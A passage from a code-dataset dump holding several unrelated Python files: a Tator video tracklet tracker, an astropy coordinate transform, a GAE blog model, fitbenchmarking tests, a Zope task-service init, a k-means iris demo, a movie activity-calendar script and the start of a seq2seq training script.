track.sort(key=lambda x:x['frame'])\n\n        def restore_det(det):\n            det['x'] = det.get('orig_x',det['x'])\n            det['y'] = det.get('orig_y',det['y'])\n            det['width'] = det.get('orig_w',det['width'])\n            det['height'] = det.get('orig_h',det['height'])\n            det['orig_x'] = det['x']\n            det['orig_y'] = det['y']\n            det['orig_w'] = det['width']\n            det['orig_h'] = det['height']\n        restore_det(track[0])\n        restore_det(track[-1])\n\n        for d in track:\n            sum_h += d['height']\n            sum_w += d['width']\n        angle,vel,comps = track_vel(track)\n        vel_x = comps[0]\n        vel_y = comps[1]\n        avg_h = sum_h / len(track)\n        avg_w = sum_w / len(track)\n        new_x = min(1,max(0,track[-1]['x']+(vel_x*ext_length)))\n        new_y = min(1,max(0,track[-1]['y']+(vel_y*ext_length)))\n        old_x = min(1,max(0,track[0]['x']-(vel_x*ext_length)))\n        old_y = min(1,max(0,track[0]['y']-(vel_y*ext_length)))\n\n\n        min_x = min(track[-1]['x'],new_x)\n        min_y = min(track[-1]['y'],new_y)\n        if min_x > 0 and min_y > 0:\n            track[-1]['x'] = min_x\n            track[-1]['y'] = min_y\n            track[-1]['width'] = min(max(0,abs(new_x-track[-1]['x'])+avg_w),1)\n            track[-1]['height'] = min(max(0,abs(new_y-track[-1]['y'])+avg_h),1)\n        else:\n            track[-1]['width'] = 0\n            track[-1]['height'] = 0\n\n\n        min_x = min(track[0]['x'],old_x)\n        min_y = min(track[0]['y'],old_y)\n        if min_x > 0 and min_y > 0:\n            track[0]['x'] = min(max(0,min_x),1)\n            track[0]['y'] = min(max(0,min_y),1)\n            track[0]['width'] = min(max(abs(old_x-track[0]['x'])+avg_w,0),1)\n            track[0]['height'] = min(max(abs(old_y-track[0]['y'])+avg_h,0),1)\n        else:\n            track[0]['width'] = 0\n            track[0]['height'] = 0\n    return tracklets\n\n\ndef split_tracklets(tracklets):\n    track_ids=[]\n    detections=[]\n    for track_id,track in tracklets.items():\n        for d in track:\n            track_ids.append(track_id)\n            detections.append(d)\n    return detections,track_ids\n\ndef trim_tracklets(detections, track_ids, max_length):\n    tracklets = join_up_iteration(detections, track_ids)\n    next_track_id = 1\n    new_tracklets = {}\n    for track_id,detections in tracklets.items():\n        new_track_count=math.ceil(len(detections)/max_length)\n        for i in range(new_track_count):\n            start=max_length*i\n            end=max_length+(max_length*i)\n            new_tracklets[next_track_id] = detections[start:end]\n            next_track_id += 1\n    detections, track_ids = split_tracklets(new_tracklets)\n    track_ids = renumber_track_ids(track_ids)\n    return detections, track_ids\n\n\nif __name__==\"__main__\":\n    parser = argparse.ArgumentParser(description=__doc__)\n    pytator.tator.cli_parser(parser)\n    parser.add_argument(\"--detection-type-id\", type=int, required=True)\n    parser.add_argument(\"--tracklet-type-id\", type=int, required=True)\n    parser.add_argument(\"--version-number\", type=int)\n    parser.add_argument(\"--version-id\", type=int)\n    parser.add_argument(\"--strategy-config\", type=str)\n    parser.add_argument('media_files', type=str, nargs='+')\n    args = parser.parse_args()\n\n    # Weight methods\n    methods = ['hybrid', 'iou', 'iou-motion']\n\n    # Weight methods that require the video\n    visual_methods = ['hybrid']\n\n    tator = pytator.Tator(args.url, args.token, args.project)\n    version_id = None\n    if args.version_number:\n        pprint(tator.Version.all())\n        for version in tator.Version.all():\n            if version['number'] == args.version_number:\n                version_id = version['id']\n        print(f\"Using version ID {version_id}\")\n    elif args.version_id:\n        version_id = args.version_id\n\n\n    default_strategy = {\"method\": \"hybrid\",\n                        \"frame-diffs\": [1,2,4,8,16,32,64,128,256],\n                        \"args\": {},\n                        \"extension\": {'method' : None},\n                        \"max-length\": {},\n                        \"min-length\": 0}\n\n    if args.strategy_config:\n        strategy = {**default_strategy}\n        with open(args.strategy_config, \"r\") as strategy_file:\n            strategy.update(yaml.load(strategy_file))\n    else:\n        strategy = default_strategy\n\n    if strategy['method'] == 'hybrid':\n        model_file = strategy['args']['model_file']\n        batch_size = strategy['args'].get('batch_size', 4)\n        comparator=FeaturesComparator(model_file)\n        #extractor=FeaturesExtractor(args.model_file)\n\n    print(\"Strategy: \")\n    pprint(strategy)\n    for media_file in args.media_files:\n        localizations_by_frame = {}\n        comps=os.path.splitext(os.path.basename(media_file))[0]\n        media_id=comps.split('_')[0]\n        lookup = {\"type\": args.detection_type_id,\n                  \"media_id\" : media_id}\n        localizations = tator.Localization.filter(lookup)\n        if len(localizations) == 0:\n            print(f\"No localizations present in media {media_file}\")\n            continue\n        print(f\"Processing {len(localizations)} detections\")\n        # Group localizations by frame\n        for lid, local in enumerate(localizations):\n            frame = local['frame']\n            if frame in localizations_by_frame:\n                localizations_by_frame[frame].append(local)\n            else:\n                localizations_by_frame[frame] = [local]\n\n        detections=[]\n        track_ids=[]\n        track_id=1\n\n        media = tator.Media.get(media_id)\n        media_shape = (media['height'], media['width'])\n        fps = media['fps']\n\n        if strategy['method'] in visual_methods:\n            vid=cv2.VideoCapture(media_file)\n            ok=True\n            frame = 0\n            while ok:\n                ok,frame_bgr = vid.read()\n                if frame in localizations_by_frame:\n                    for l in localizations_by_frame[frame]:\n                        if strategy['method'] == 'hybrid':\n                            l['bgr'] = crop_localization(frame_bgr, l)\n                        if l['attributes']['Confidence'] < 0.50:\n                            continue\n                        detections.append(l)\n                        track_ids.append(track_id)\n                        track_id += 1\n                frame+=1\n        else:\n            # The method is analytical on the detections coordinates\n            # and does not require processing the video\n            for frame,frame_dets in localizations_by_frame.items():\n                for det in frame_dets:\n                    detections.append(det)\n                    track_ids.append(track_id)\n                    track_id += 1\n\n        track_ids = renumber_track_ids(track_ids)\n\n        if strategy['method'] == 'hybrid':\n            weights_strategy = HybridWeights(comparator,\n                                             None,\n                                             None,\n                                             media_shape,\n                                             fps,\n                                             0.0,\n                                             batch_size)\n        elif strategy['method'] == 'iou':\n            weights_strategy = IoUWeights(media_shape, **strategy['args'])\n        elif strategy['method'] == 'iou-motion':\n            weights_strategy = IoUMotionWeights(media_shape, **strategy['args'])\n        # Generate localization bgr based on grouped localizations\n        for x in strategy['frame-diffs']:\n            detections, track_ids, pairs, weights, is_cut, constraints = join_tracklets(\n                detections,\n                track_ids,\n                x,\n                weights_strategy)\n\n            if x in strategy['max-length']:\n                trim_to = strategy['max-length'][x]\n                print(f\"Trimming track to max length of {trim_to}\")\n                detections, track_ids = trim_tracklets(detections, track_ids, trim_to)\n            _,det_counts_per_track=np.unique(track_ids,return_counts=True)\n            print(f\"frame-diff {x}: {len(detections)} to {len(det_counts_per_track)}\")\n\n            if x > 1 and strategy['extension']['method'] == 'linear-motion':\n                ext_frames=x\n                print(f\"Extending by linear motion, {ext_frames}\")\n                tracklets = join_up_iteration(detections,track_ids)\n                tracklets = extend_tracklets(tracklets, ext_frames)\n                detections, track_ids = split_tracklets(tracklets)\n\n        # Now we make new track objects based on the result\n        # from the graph solver\n        # [ detection, detection, detection, ...]\n        # [ track#, track#, track#,...]\n        # [ 133, 33, 13, 133,]\n        # [ 0,0,1,1]\n        # TODO: Handle is_cut?\n        def join_up_final(detections, 
track_ids):\n tracklets = defaultdict(list)\n num_tracklets = np.max(track_ids) + 1\n assert(len(detections) == len(track_ids))\n for d,tid in zip(detections, track_ids):\n tracklets[tid].append(d)\n return tracklets\n\n def make_object(track):\n # Only use last 50% for velocity\n track_len = len(track)\n velocity_len = int(track_len*0.50)\n track.sort(key=lambda x:x['frame'])\n angle,speed,comps = track_vel(track[velocity_len:])\n obj={\"type\": args.tracklet_type_id,\n \"media_ids\": [int(media_id)],\n \"localization_ids\": [x['id'] for x in track],\n \"Species\": \"Tracklet\",\n \"length\": len(track),\n \"angle\": math.degrees(angle),\n \"speed\": speed,\n \"version\": version_id}\n print(f\"{track[0]['frame']}: {angle} - {comps}\")\n angle = math.degrees(angle)\n # Remark: y is down, so 90 degrees is DOWN.\n if len(track) < 200:\n obj['Species'] = 'Toss out'\n elif speed < 0.00001:\n obj['Species'] = 'Stationary'\n elif angle > -45 and angle < 45:\n obj['Species'] = 'Exiting'\n elif angle > -135 and angle < 175:\n obj['Species'] = 'Entering'\n else:\n obj['Species'] = 'Unknown'\n return obj\n\n tracklets = join_up_final(detections, track_ids)\n new_objs=[make_object(tracklet) for tracklet in tracklets.values() if len(tracklet) > strategy['min-length']]\n with open(f\"/work/{media_id}.json\", \"w\") as f:\n json.dump(new_objs,f)\n tator.Track.new(new_objs)\n tator.Media.update(int(media_id), {\"attributes\":{\"Tracklet Generator Processed\": str(datetime.datetime.now())}})\n","sub_path":"scripts/tator_tracker.py","file_name":"tator_tracker.py","file_ext":"py","file_size_in_byte":12024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"64574377","text":"from astropy.coordinates import SkyCoord, EarthLocation, AltAz\nfrom astroplan import Observer\nimport yaml\nimport astropy.units as u\nimport sys\n\ndef transform(ra_dec_list, parameter_file_name):\n \n with open(parameter_file_name, 'r') as param_file:\n param_dict = yaml.safe_load(param_file)\n prototype_dish = EarthLocation(lat = param_dict['telescope']['antenna_position']['latitude'] * u.deg, lon = param_dict['telescope']['antenna_position']['longitude'] * u.deg, height = param_dict['telescope']['antenna_position']['height'] * u.m)\n \n ra_list = ra_dec_list[0]\n dec_list = ra_dec_list[1]\n v_time = ra_dec_list[2]\n \n sc = SkyCoord(ra_list, dec_list, unit='deg', frame=\"icrs\")\n prototype_dish_observer = Observer(location=prototype_dish)\n grid_altaz = sc.transform_to(AltAz(obstime=v_time, location=prototype_dish))\n \n az_list = [grid_altaz[i].az.value for i in range(len(grid_altaz))]\n alt_list = [grid_altaz[i].alt.value for i in range(len(grid_altaz))]\n parallactic_angle_list = prototype_dish_observer.parallactic_angle(time = v_time, target = sc).deg\n \n table = \"\"\n for i in range(len(az_list)):\n table_line=\"{0} {1:3.8f} {2:3.8f} {3} {4}\".format(v_time[i].mjd, az_list[i], alt_list[i], 1, parallactic_angle_list[i], file = sys.stdout, flush = True)\n table+=table_line+\"\\n\"\n \n return[az_list, alt_list, v_time, table]\n","sub_path":"transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"53016548","text":"#coding=utf-8\n\nfrom google.appengine.ext import db\nfrom users.models import User\n\nclass Post(db.Model):\n author = db.ReferenceProperty(User, collection_name='posts')\n title = db.StringProperty(required=True)\n body = 
db.TextProperty(required=True)\n\n    created_at = db.DateTimeProperty(auto_now_add=True)\n    modified_at = db.DateTimeProperty(auto_now=True)\n\n    def to_dict(self):\n        return {\n            'id' : self.key().id(),\n            'title' : self.title,\n            'body' : self.body,\n            'created_at' : self.created_at.strftime('%Y-%m-%d %H:%M:%S'),\n            'modified_at' : self.modified_at.strftime('%Y-%m-%d %H:%M:%S'),\n            'author' : self.author.to_dict()\n        }\n\n    def belongs_to(self, user):\n        return user.key() == self.author.key()\n\n    @classmethod\n    def fetch(cls, since_post=None, until_post=None, count=8):\n        queryset = cls.all().order('-created_at')\n        query = {\n            'limit' : count,\n            'offset' : 0\n        }\n        \n        if since_post:\n            queryset.filter('created_at >', since_post.created_at)\n            results_count = queryset.count()\n            \n            if results_count > count:\n                query['offset'] = results_count - count \n            \n        elif until_post:\n            queryset.filter('created_at <', until_post.created_at)\n\n        return queryset.fetch(**query)\n    \n\n\n","sub_path":"posts/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"411489213","text":"from __future__ import (absolute_import, division, print_function)\n\nimport unittest\nimport os\n\nfrom fitbenchmarking.utils.misc import get_problem_files\n\n\nclass CreateDirsTests(unittest.TestCase):\n\n    def base_path(self):\n        \"\"\"\n        Helper function that returns the path to\n        /fitbenchmarking/benchmark_problems\n        \"\"\"\n\n        current_dir = os.path.dirname(os.path.realpath(__file__))\n        parent_dir = os.path.dirname(os.path.normpath(current_dir))\n        main_dir = os.path.dirname(os.path.normpath(parent_dir))\n        root_dir = os.path.dirname(os.path.normpath(main_dir))\n        bench_prob_dir = os.path.join(root_dir, 'benchmark_problems')\n\n        return bench_prob_dir\n\n    def all_neutron_problems(self):\n        \"\"\"\n        Helper function that returns the names of all neutron problems.\n        \"\"\"\n\n        neutron_problems = [['ENGINX193749_calibration_peak19.txt',\n                             'ENGINX193749_calibration_peak20.txt',\n                             'ENGINX193749_calibration_peak23.txt',\n                             'ENGINX193749_calibration_peak5.txt',\n                             'ENGINX193749_calibration_peak6.txt',\n                             'ENGINX236516_vanadium_bank1_10brk.txt',\n                             'ENGINX236516_vanadium_bank1_20brk.txt',\n                             'EVS14188-90_Gaussian_peaks_1.txt',\n                             'EVS14188-90_Gaussian_peaks_2.txt',\n                             'GEMpeak1.txt',\n                             'WISH17701_peak1.txt', 'WISH17701_peak2.txt',\n                             'WISH17701_peak3.txt', 'WISH17701_peak4.txt',\n                             'WISH17701_peak5.txt', 'WISH17701_peak6.txt',\n                             'WISH17701_peak7.txt', 'WISH17701_peak8.txt',\n                             'WISH17701_peak9.txt']]\n\n        return neutron_problems\n\n    def all_nist_problems(self):\n        \"\"\"\n        Helper function that returns the names of Nist low diff problems.\n        \"\"\"\n\n        nist_ld_problems = [['Misra1a.dat', 'Chwirut2.dat', 'Chwirut1.dat',\n                             'Lanczos3.dat', 'Gauss1.dat', 'Gauss2.dat',\n                             'DanWood.dat', 'Misra1b.dat']]\n\n        return nist_ld_problems\n\n    def test_getProblemFiles_get_correct_nist_probs(self):\n\n        data_dir = os.path.join(self.base_path(), 'NIST', 'low_difficulty')\n        nist_problems = self.all_nist_problems()\n\n        problem_groups = get_problem_files(data_dir)\n        problem_groups_expected = nist_problems\n\n        self.assertTrue(problem_groups_expected, problem_groups)\n\n    def test_getProblemFiles_return_expected_neutron_paths(self):\n\n        base_path_neutron = os.path.join(self.base_path(), 'Neutron')\n        neutron_problems = self.all_neutron_problems()\n\n        paths_to_neutron_problems = \\\n            get_problem_files(base_path_neutron)\n        # Please see the above for loop comments for\n        # a 
description of this one\n        paths_to_neutron_problems_expected = []\n        for neutron_level_group in neutron_problems:\n            paths_to_level_group = \\\n                [os.path.join(base_path_neutron, neutron_prob_name)\n                 for neutron_prob_name in neutron_level_group]\n\n            paths_to_neutron_problems_expected.append(paths_to_level_group)\n\n        self.assertListEqual(paths_to_neutron_problems_expected[0],\n                             paths_to_neutron_problems)\n\n\nif __name__ == \"__main__\":\n    unittest.main()\n","sub_path":"fitbenchmarking/utils/tests/test_misc.py","file_name":"test_misc.py","file_ext":"py","file_size_in_byte":3495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"633797787","text":"# Make a package.\nfrom lovely.remotetask.service import TaskService\n\ntry:\n    from Products.Five.site.interfaces import IFiveUtilityRegistry\n    ZOPE2=True\nexcept ImportError:\n    ZOPE2=False\n    \n# This is implemented as IDatabaseOpenedEvent in Zope 3\nif ZOPE2:\n    from lovely.remotetask.service import TaskService, getAutostartServiceNames\n    from lovely.remotetask.interfaces import ITaskService\n    from zope.component import ComponentLookupError\n    from zope.app.component.hooks import getSite, setSite\n    from Products.CMFCore.interfaces._content import ISiteRoot\n\n    def initialize(context):\n        # dirty trick, but it works\n        app = context._ProductContext__app\n        services = getAutostartServiceNames()\n        old_site = getSite()\n        for service in services:\n            site_name, service_name = service.split('@')\n            if site_name:\n                site = getattr(app, site_name, None)\n                if site:\n                    registry = site.getSiteManager()\n                    setSite(site) # blah, five/localsitemanager/registry.py ver. 1.1, line 108, in _wrap can't find site.\n                    service = registry.getUtility(ITaskService, name=service_name)\n                    if ITaskService.providedBy(service) and not service.isProcessing():\n                        service.startProcessing()\n        setSite(old_site)\n","sub_path":"lovely.remotetask/tags/port-for-zope210-before-gotcha-work/src/lovely/remotetask/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"419770064","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Mar 16 11:31:45 2020\r\n@author: Hexin Yuan 19210240055\r\n\"\"\"\r\nimport numpy as np\r\n\r\n\r\ndef import_data_from_iris(filename):\r\n    data = []\r\n    cluster_raw = []\r\n\r\n    with open(str(filename), 'r') as f:\r\n        for line in f:\r\n            line_temp = line.strip().split()\r\n            line_temp_dumy = []\r\n            for j in range(0, len(line_temp) - 1):\r\n                line_temp_dumy.append(float(line_temp[j]))\r\n            data.append(line_temp_dumy)\r\n            cluster_raw.append(line_temp[j + 1])\r\n\r\n    return data, cluster_raw\r\n\r\n\r\ndef eucl_distance(p1, p2):\r\n    return np.sqrt(np.sum((p1 - p2) ** 2))\r\n\r\n\r\ndef init_centroids(data, k):\r\n    samples_num, dim = data.shape\r\n    num_arr = np.arange(0, samples_num)\r\n    np.random.shuffle(num_arr)\r\n    centroids = data[num_arr[:k], :]\r\n    return centroids\r\n\r\n\r\ndef k_means(data, k):\r\n    samples_num = data.shape[0]\r\n    cluster_data = np.array(np.zeros((samples_num, 2)))\r\n    cluster_changed = True\r\n    centroids = init_centroids(data, k)\r\n    print(\"Initial centroids:\\n\", centroids)\r\n    count = 0\r\n\r\n    while cluster_changed:\r\n        count += 1\r\n        cluster_changed = False\r\n        for i in range(samples_num):\r\n            min_dist = 100000.0\r\n            min_index = 0\r\n            for j in range(k):\r\n                distance = eucl_distance(centroids[j, :], data[i, :])\r\n                if distance < min_dist:\r\n                    min_dist = distance\r\n                    cluster_data[i, 1] = min_dist\r\n                    min_index = j\r\n            if cluster_data[i, 0] != min_index:\r\n                cluster_changed = True\r\n                cluster_data[i, 0] = min_index\r\n        for j in range(k):\r\n            cluster_index = np.nonzero(cluster_data[:, 0] == j)\r\n            points_in_cluster = data[cluster_index]\r\n            centroids[j, :] = np.mean(points_in_cluster, axis=0)\r\n\r\n    print(\"Number of iterations:\", count)\r\n    return centroids, cluster_data\r\n\r\n\r\ndef calculate_accuracy(cluster_data, k_num):\r\n    right = 0\r\n    for k in range(0, k_num):\r\n        checker = [0, 0, 0]\r\n        for i in range(0, 50):\r\n            checker[int(cluster_data[i + 50 * k, 0])] += 1\r\n        right += max(checker)\r\n    return right\r\n\r\n\r\nif __name__ == '__main__':\r\n    data, cluster_raw = import_data_from_iris(\"iris.dat\")\r\n    print(\"iris.dat data:\\n\", data)\r\n    dataArr = np.array(data)\r\n\r\n    centroids, cluster_data = k_means(dataArr, 3)\r\n    print(\"Resulting cluster centroids:\\n\", centroids)\r\n\r\n    for i in range(3):\r\n        print(i, \"cluster contains samples:\")\r\n        for j in range(len(data)):\r\n            if int(cluster_data[j, 0]) == i:\r\n                print(j, data[j], \"distance to centroid:\", cluster_data[j, 1])\r\n\r\n    right_num = calculate_accuracy(cluster_data, 3)\r\n    print(\"Error rate:\", 1 - right_num / len(data))\r\n\r\n\r\n","sub_path":"demo - k-means.py","file_name":"demo - k-means.py","file_ext":"py","file_size_in_byte":2883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"71340137","text":"\"\"\" Statistics \"\"\"\n\nfrom itertools import islice, groupby\nfrom collections import defaultdict\nimport tempfile\nimport subprocess\nimport datetime\n\nimport data\nfrom entry import Entry\n\nWEEKDAY_STR = ['Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun']\n\ndef activity_calendar(args, formatter='text', span=None):\n    \"\"\"Build a github-like activity calendar for the last `span` days.\n    Positional argument `formatter` determines the driver used,\n    defaulting to text. \"\"\"\n\n    formatter = 'html' if args.html else 'text'\n\n    span = span or args.days or 365\n    day_modifier = '-{0} days'.format(span)\n\n    db = data.DataFacilities(dbfile=args.db_file)\n\n    watched = db.query(\"SELECT origdate, count(movie) FROM movies \"\n                       + \"WHERE origdate >= date('now', ?) \"\n                       + \"GROUP BY date(origdate) \"\n                       + \"ORDER BY origdate ASC \"\n                       , (day_modifier,))\n\n    watcheddict = defaultdict(lambda: 0)\n    for date, count in watched:\n        d = date.date()\n        watcheddict[d] = count\n\n    text = FORMATTERS[formatter](watcheddict)\n\n    if args.open:\n        with tempfile.NamedTemporaryFile(suffix='.html') as tf:\n            # At least Firefox in linux will not throw the page away\n            # even when the tempfile under it is removed quite\n            # immediately.\n            tf.write(text)\n            tf.flush()\n            subprocess.call([\"xdg-open\", tf.name])\n    else:\n        print(text)\n\n### FORMATTERS\n## Take the dict of {date: count} and return string outputs for\n## files/stdout.\n\n\n### Formatter helpers\n\ndef get_date_interval(start_date, end_date=None):\n    \"\"\"Get two date objects, return a list of dates in between. Rounds\n    in full weeks.\"\"\"\n\n    # round up to full weeks\n    start_date += datetime.timedelta(days=-start_date.weekday())\n\n    end_date = end_date or datetime.date.today()\n    end_date += datetime.timedelta(days=(6-end_date.weekday()))\n\n    dateint = []\n    while start_date <= end_date:\n        dateint.append(start_date)\n        start_date += datetime.timedelta(days=1)\n    \n    return dateint\n\ndef get_weekstarts(date_interval):\n    \"\"\"Collect beginning date of each week in separate list. We do\n    
We do\n assume that the list begins with your begin date of choice.\"\"\"\n return [d for d in islice(date_interval, 0, None, 7)]\n\ndef actcal_text(watched):\n \"\"\"Format activity calendar in text.\"\"\"\n\n dateint = get_date_interval(start_date=sorted(watched.keys())[0])\n weekstarts = get_weekstarts(dateint)\n\n monthline = ' '.join(d.strftime(\"%b\") for d in weekstarts)\n result = []\n result.append(\" \" * 4 + \"| \" + monthline)\n result.append(\" \" * 4 + \"| \"\n + ' '.join('{0:<3}'.format(ws.day) for ws in weekstarts))\n result.append('=' * (len(monthline) + 6))\n\n for weekday in range(0, 7):\n row = '{0} | '.format(WEEKDAY_STR[weekday])\n for d in islice(dateint, weekday, None, 7):\n row += '{0} '.format(watched[d])\n result.append(row)\n\n return '\\n'.join(result)\n\n\ndef draw_view_graph(watched):\n \"\"\"Draw and return an SVG code snippet of views cumulating over time.\"\"\"\n try:\n import pygal\n except ImportError:\n return \"ERROR: pygal not installed\"\n\n chart = pygal.Line(width=600, height=400,\n disable_xml_declaration=True,\n style=pygal.style.LightStyle)\n\n chart.title = 'Views over time'\n chart.show_legend = False\n chart.show_dots = False\n\n wsorted = sorted(watched.keys())\n\n cumsum = [(wsorted[0], watched[wsorted[0]])]\n for key in wsorted[1:]:\n lastval = cumsum[-1][1]\n cumsum.append((key, lastval + watched[key]))\n\n xlabels = [''] * len(cumsum)\n for ind in range(0, len(cumsum), 7):\n xlabels[ind] = cumsum[ind][0].strftime(\"%a %b %Y\")\n\n chart.x_labels = xlabels\n chart.x_label_rotation = 45\n chart.add('View count', [s[1] for s in cumsum])\n\n return \"
{0}
\".format(chart.render())\n\ndef actcal_html(watched):\n \"\"\"Format activity calendar in HTML. Also include a SVG graph of\n views cumulating.\"\"\"\n dateint = get_date_interval(start_date=sorted(watched.keys())[0])\n weekstarts = get_weekstarts(dateint)\n\n result = [\n '',\n '',\n '',\n '',\n ''\n ]\n\n result.append(\"

Films watched in {0}...{1}

\".format(\n dateint[0], dateint[-1]))\n result.append(\"\")\n\n def silent_coercion(i):\n \"\"\"Coerce given object to integer. If not integer, throw\n something negative.\"\"\"\n try:\n return int(i)\n except ValueError:\n return -1\n\n def make_row(items, force_class=None):\n res = ['']\n for i in items:\n format_class = ''\n if silent_coercion(i) > 2:\n format_class = 'lots'\n elif i == 2:\n format_class = 'good'\n elif i == 1:\n format_class = 'one'\n\n if force_class:\n format_class = force_class\n\n format_string = ''\n res.append(format_string.format(i))\n res.append('')\n return ''.join(res)\n\n monthline = [d.strftime(\"%b
%d\") for d in weekstarts]\n result.append(make_row([''] + monthline, 'heading'))\n for weekday in range(0, 7):\n row = make_row([WEEKDAY_STR[weekday]] +\n [watched[d]\n for d in islice(dateint, weekday, None, 7)])\n result.append(row)\n \n \n result.append(\"
{0}
\")\n\n # result.append(\"

Views over time

\")\n result.append(draw_view_graph(watched))\n\n result.append(\"\")\n result.append(\"\")\n\n return '\\n'.join(result)\n \n\nFORMATTERS = {'text': actcal_text,\n 'html': actcal_html}\n","sub_path":"stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":6219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"46763209","text":"# coding: utf-8\nfrom __future__ import division\nfrom __future__ import print_function\nfrom six.moves import xrange\nimport argparse, sys, os, codecs, random, math, time\nimport numpy as np\nimport chainer\nimport chainer.functions as F\nfrom chainer import training, Variable, optimizers, cuda\nfrom chainer.training import extensions\nsys.path.append(os.path.split(os.getcwd())[0])\nfrom common import ID_UNK, ID_PAD, ID_GO, ID_EOS, bucket_sizes, stdout, print_bold\nfrom dataset import read_data, make_buckets, make_source_target_pair, sample_batch_from_bucket\nfrom eve import Eve\nfrom model import seq2seq, load_model, save_model, save_vocab\nfrom error import compute_mean_wer, compute_random_mean_wer, softmax_cross_entropy\nfrom translate import show_random_source_target_translation\n\n# reference\n# https://www.tensorflow.org/tutorials/seq2seq\n\ndef main(args):\n\t# load textfile\n\tsource_dataset, target_dataset, vocab, vocab_inv = read_data(args.source_filename, args.target_filename, train_split_ratio=args.train_split, dev_split_ratio=args.dev_split, seed=args.seed)\n\tsave_vocab(args.model_dir, vocab, vocab_inv)\n\n\tsource_dataset_train, source_dataset_dev, source_dataset_test = source_dataset\n\ttarget_dataset_train, target_dataset_dev, target_dataset_test = target_dataset\n\tprint_bold(\"data\t#\")\n\tprint(\"train\t{}\".format(len(source_dataset_train)))\n\tprint(\"dev\t{}\".format(len(source_dataset_dev)))\n\tprint(\"test\t{}\".format(len(source_dataset_test)))\n\n\tvocab_source, vocab_target = vocab\n\tvocab_inv_source, vocab_inv_target = vocab_inv\n\tprint(\"vocab\t{}\t(source)\".format(len(vocab_source)))\n\tprint(\"vocab\t{}\t(target)\".format(len(vocab_target)))\n\n\t# split into buckets\n\tsource_buckets_train, target_buckets_train = make_buckets(source_dataset_train, target_dataset_train)\n\tif args.buckets_limit is not None:\n\t\tsource_buckets_train = source_buckets_train[:args.buckets_limit+1]\n\t\ttarget_buckets_train = target_buckets_train[:args.buckets_limit+1]\n\n\tprint_bold(\"buckets \t#data\t(train)\")\n\tfor size, data in zip(bucket_sizes, source_buckets_train):\n\t\tprint(\"{} \t{}\".format(size, len(data)))\n\n\tprint_bold(\"buckets \t#data\t(dev)\")\n\tsource_buckets_dev, target_buckets_dev = make_buckets(source_dataset_dev, target_dataset_dev)\n\tif args.buckets_limit is not None:\n\t\tsource_buckets_dev = source_buckets_dev[:args.buckets_limit+1]\n\t\ttarget_buckets_dev = target_buckets_dev[:args.buckets_limit+1]\n\tfor size, data in zip(bucket_sizes, source_buckets_dev):\n\t\tprint(\"{} \t{}\".format(size, len(data)))\n\n\tprint_bold(\"buckets\t\t#data\t(test)\")\n\tsource_buckets_test, target_buckets_test = make_buckets(source_dataset_test, target_dataset_test)\n\tif args.buckets_limit is not None:\n\t\tsource_buckets_test = source_buckets_test[:args.buckets_limit+1]\n\t\ttarget_buckets_test = target_buckets_test[:args.buckets_limit+1]\n\tfor size, data in zip(bucket_sizes, source_buckets_test):\n\t\tprint(\"{} \t{}\".format(size, len(data)))\n\n\t# to maintain equilibrium\n\tmin_num_data = 0\n\tfor data in source_buckets_train:\n\t\tif min_num_data == 0 or 
len(data) < min_num_data:\n\t\t\tmin_num_data = len(data)\n\trepeats = []\n\tfor data in source_buckets_train:\n\t\trepeats.append(len(data) // min_num_data + 1)\n\n\tnum_updates_per_iteration = 0\n\tfor repeat, data in zip(repeats, source_buckets_train):\n\t\tnum_updates_per_iteration += repeat * args.batchsize\n\tnum_iteration = len(source_dataset_train) // num_updates_per_iteration + 1\n\n\t# init\n\tmodel = load_model(args.model_dir)\n\tif model is None:\n\t\tmodel = seq2seq(len(vocab_source), len(vocab_target), args.ndim_embedding, args.num_layers, ndim_h=args.ndim_h, pooling=args.pooling, dropout=args.dropout, zoneout=args.zoneout, wgain=args.wgain, densely_connected=args.densely_connected, attention=args.attention)\n\tif args.gpu_device >= 0:\n\t\tcuda.get_device(args.gpu_device).use()\n\t\tmodel.to_gpu()\n\n\t# setup an optimizer\n\tif args.eve:\n\t\toptimizer = Eve(alpha=args.learning_rate, beta1=0.9)\n\telse:\n\t\toptimizer = optimizers.Adam(alpha=args.learning_rate, beta1=0.9)\n\toptimizer.setup(model)\n\toptimizer.add_hook(chainer.optimizer.GradientClipping(args.grad_clip))\n\toptimizer.add_hook(chainer.optimizer.WeightDecay(args.weight_decay))\n\tmin_learning_rate = 1e-7\n\tprev_wer = None\n\ttotal_time = 0\n\n\tdef mean(l):\n\t\treturn sum(l) / len(l)\n\n\t# training\n\tfor epoch in xrange(1, args.epoch + 1):\n\t\tprint(\"Epoch\", epoch)\n\t\tstart_time = time.time()\n\t\tfor itr in xrange(1, num_iteration + 1):\n\t\t\tfor repeat, source_bucket, target_bucket in zip(repeats, source_buckets_train, target_buckets_train):\n\t\t\t\tfor r in xrange(repeat):\n\t\t\t\t\t# sample minibatch\n\t\t\t\t\tsource_batch, target_batch = sample_batch_from_bucket(source_bucket, target_bucket, args.batchsize)\n\t\t\t\t\tskip_mask = source_batch != ID_PAD\n\t\t\t\t\ttarget_batch_input, target_batch_output = make_source_target_pair(target_batch)\n\n\t\t\t\t\t# to gpu\n\t\t\t\t\tif model.xp is cuda.cupy:\n\t\t\t\t\t\tskip_mask = cuda.to_gpu(skip_mask)\n\t\t\t\t\t\tsource_batch = cuda.to_gpu(source_batch)\n\t\t\t\t\t\ttarget_batch_input = cuda.to_gpu(target_batch_input)\n\t\t\t\t\t\ttarget_batch_output = cuda.to_gpu(target_batch_output)\n\n\t\t\t\t\t# compute 